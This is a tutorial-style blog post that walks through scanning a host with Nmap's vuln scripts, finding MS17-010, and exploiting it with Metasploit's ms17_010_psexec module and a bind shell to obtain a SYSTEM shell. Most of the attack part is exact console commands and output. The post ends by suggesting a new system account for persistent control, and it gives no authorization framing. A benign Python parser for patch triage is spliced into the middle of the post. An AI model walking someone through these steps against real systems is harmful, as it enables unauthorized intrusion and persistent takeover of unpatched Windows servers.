Using Metasploit + Nmap to penetrate a network server in a few simple steps and obtain administrative privileges directly


I won't say much here about Metasploit, the powerful penetration-testing framework, nor about Nmap, the powerful port scanner that everyone in the hacking world knows. This post mainly shows how to use the two tools together. Without further ado, let's get to the point.

Step 1: Scan with Nmap

msf5 > db_nmap --script=vuln 192.168.41.143
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:25 CST
[*] Nmap: Nmap scan report for 192.168.41.143
[*] Nmap: Host is up (0.00055s latency).
[*] Nmap: All 1000 scanned ports on 192.168.41.143 are filtered
[*] Nmap: MAC Address: 00:0C:29:42:D2:0A (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 36.95 seconds

msf5 > db_nmap --script=vuln 192.168.41.143
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:28 CST
[*] Nmap: Nmap scan report for 192.168.41.143
[*] Nmap: Host is up (0.00076s latency).
[*] Nmap: All 1000 scanned ports on 192.168.41.143 are filtered
[*] Nmap: MAC Address: 00:0C:29:42:D2:0A (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 38.98 seconds

msf5 > db_nmap --script=vuln 192.168.41.142
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:30 CST
[*] Nmap: Nmap scan report for 192.168.41.142
[*] Nmap: Host is up (0.00044s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT    STATE SERVICE
[*] Nmap: 135/tcp open  msrpc
[*] Nmap: 139/tcp open  netbios-ssn
[*] Nmap: 445/tcp open  microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:5D:58:E1 (VMware)
[*] Nmap: Host script results:
[*] Nmap: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
[*] Nmap: |_smb-vuln-ms10-054: false
[*] Nmap: |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
[*] Nmap: | smb-vuln-ms17-010:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     IDs:  CVE:CVE-2017-0143
[*] Nmap: |     Risk factor: HIGH
[*] Nmap: |       A critical remote code execution vulnerability exists in Microsoft SMBv1
[*] Nmap: |        servers (ms17-010).
[*] Nmap: |
[*] Nmap: |     Disclosure date: 2017-03-14
[*] Nmap: |     References:
[*] Nmap: |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
[*] Nmap: |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
[*] Nmap: |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 21.53 seconds

Looking at the scan results, we can see that there are a few exploitable vulnerabilities; port 445 is open, so SMB is present. We'll simply pick one of the vulnerabilities and use it for the penetration attack.
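To turn scan output like the above into something a defender can act on, here is an added Python example (not from this post, and not part of Nmap or Metasploit) that parses the lines db_nmap echoes into per-host findings and lists the hosts whose NSE scripts reported an explicit "State: VULNERABLE". The embedded sample is taken from the scan output shown above; the host whose ports were all filtered yields an empty report rather than an error. The function and class names are this example's own.

```python
"""Parse db_nmap / Nmap normal output into per-host findings for patch triage."""
import re
from dataclasses import dataclass, field

# Lines as echoed by msfconsole's db_nmap in the scan above (a fully filtered
# host followed by the host with the MS17-010 finding).
SAMPLE_SCAN = """\
[*] Nmap: Nmap scan report for 192.168.41.143
[*] Nmap: Host is up (0.00055s latency).
[*] Nmap: All 1000 scanned ports on 192.168.41.143 are filtered
[*] Nmap: MAC Address: 00:0C:29:42:D2:0A (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 36.95 seconds
[*] Nmap: Nmap scan report for 192.168.41.142
[*] Nmap: Host is up (0.00044s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT    STATE SERVICE
[*] Nmap: 135/tcp open  msrpc
[*] Nmap: 139/tcp open  netbios-ssn
[*] Nmap: 445/tcp open  microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:5D:58:E1 (VMware)
[*] Nmap: Host script results:
[*] Nmap: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
[*] Nmap: |_smb-vuln-ms10-054: false
[*] Nmap: |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
[*] Nmap: | smb-vuln-ms17-010:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     IDs:  CVE:CVE-2017-0143
[*] Nmap: |     Risk factor: HIGH
[*] Nmap: |
[*] Nmap: |     Disclosure date: 2017-03-14
[*] Nmap: |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 21.53 seconds
"""

PREFIX_RE = re.compile(r"^\[\*\] Nmap:\s?")          # db_nmap's per-line prefix
REPORT_RE = re.compile(r"^Nmap scan report for (\S+)")
FILTERED_RE = re.compile(r"^All (\d+) scanned ports on \S+ are filtered")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
SCRIPT_HEAD_RE = re.compile(r"^\|_?\s?([a-z0-9][\w.-]*):\s*(.*)$")  # "| name:" / "|_name: value"
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class HostReport:
    address: str
    up: bool = False
    all_filtered: bool = False
    open_ports: list = field(default_factory=list)   # (port, proto, service)
    scripts: dict = field(default_factory=dict)      # script name -> output lines

    def vulnerable_scripts(self) -> list:
        """Scripts whose output carries an explicit 'State: VULNERABLE' line."""
        return sorted(name for name, lines in self.scripts.items()
                      if any(line.strip().startswith("State: VULNERABLE") for line in lines))

    def cves(self) -> list:
        """CVE ids mentioned by the scripts that reported VULNERABLE."""
        found = set()
        for name in self.vulnerable_scripts():
            for line in self.scripts[name]:
                found.update(CVE_RE.findall(line))
        return sorted(found)


def parse_db_nmap(text: str) -> dict:
    """Return {address: HostReport} for each 'Nmap scan report' block; accepts raw Nmap
    output or db_nmap's prefixed lines. Lines before the first report are ignored."""
    reports, host, current_script = {}, None, None
    for raw in text.splitlines():
        line = PREFIX_RE.sub("", raw).rstrip()
        m = REPORT_RE.match(line)
        if m:
            host = reports.setdefault(m.group(1), HostReport(m.group(1)))
            current_script = None
            continue
        if host is None:
            continue
        if line.startswith("|"):                      # NSE script output block
            m = SCRIPT_HEAD_RE.match(line)
            if m:
                current_script = m.group(1)
                host.scripts[current_script] = [m.group(2)] if m.group(2) else []
            elif current_script is not None:
                host.scripts[current_script].append(line.lstrip("|_ "))
            continue
        current_script = None
        if line.startswith("Host is up"):
            host.up = True
        elif FILTERED_RE.match(line):
            host.all_filtered = True
        else:
            m = PORT_RE.match(line)
            if m and m.group(3) == "open":
                host.open_ports.append((int(m.group(1)), m.group(2), m.group(4)))
    return reports


def patch_queue(reports: dict) -> list:
    """(address, [vulnerable scripts], [CVEs]) for every host with a VULNERABLE finding."""
    return [(addr, r.vulnerable_scripts(), r.cves())
            for addr, r in sorted(reports.items()) if r.vulnerable_scripts()]


if __name__ == "__main__":
    for addr, scripts, cves in patch_queue(parse_db_nmap(SAMPLE_SCAN)):
        print(f"{addr}: {', '.join(scripts)} ({', '.join(cves)})")
```

Only the "State: VULNERABLE" marker counts as a finding: "false", NT_STATUS_ACCESS_DENIED and "ERROR: Script execution failed" stay in the report for review but do not enter the patch queue, which matches what the scan above actually reported for this host.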

Step 2: Use Metasploit to look up the matching vulnerability module

First enter the command search ms17-010 to check whether there is a matching vulnerability module:

msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

The results show that there is a matching vulnerability module; "ms17" refers to a vulnerability that appeared in 2017. With a matching module, things are easy: pick any one of the three exploit modules at the bottom. Here I choose the last one to carry the attack further.

Step 3: Select the corresponding attack module

Since I can't capture a complete screenshot, I'm pasting the console output instead:

msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > show options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                yes       The target address range or CIDR identifier
   RPORT                 445                                                             yes       The Target port
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as

Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic

First we run the command show options to see which settings need to be configured; naturally, the target server's IP has to be set. Once that is configured, everything is ready:

msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.41.142
RHOSTS => 192.168.41.142
msf5 exploit(windows/smb/ms17_010_psexec) >

At this point everything is configured. I'm getting a bit excited now and can't wait to give the order to attack. The attack command: exploit

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] 192.168.41.142:445 - Target OS: Windows 5.1
[*] 192.168.41.142:445 - Filling barrel with fish... done
[*] 192.168.41.142:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.41.142:445 -   [*] Preparing dynamite...
[*] 192.168.41.142:445 -     [*] Trying stick 1 (x86)...Boom!
[*] 192.168.41.142:445 -   [+] Successfully Leaked Transaction!
[*] 192.168.41.142:445 -   [+] Successfully caught Fish-in-a-barrel
[*] 192.168.41.142:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.41.142:445 - Reading from CONNECTION struct at: 0x821e58b0
[*] 192.168.41.142:445 - Built a write-what-where primitive...
[+] 192.168.41.142:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.41.142:445 - Selecting native target
[*] 192.168.41.142:445 - Uploading payload... uIppviFQ.exe
[*] 192.168.41.142:445 - Created uIppviFQ.exe...
[+] 192.168.41.142:445 - Service started successfully...
[*] 192.168.41.142:445 - Deleting uIppviFQ.exe...
[*] Started bind TCP handler against 192.168.41.142:4444
[*] Command shell session 1 opened (192.168.41.128:33767 -> 192.168.41.142:4444) at 2019-08-24 01:41:00 +0800

We can see that the attack has now gone in through port 445. Further down we can see that the intrusion succeeded and a shell came back. We now hold SYSTEM privileges on this server; checking the network connections shows that the connection was established. With cmd access we can control the server, for example by creating a system account to escalate privileges and keep persistent control of it.
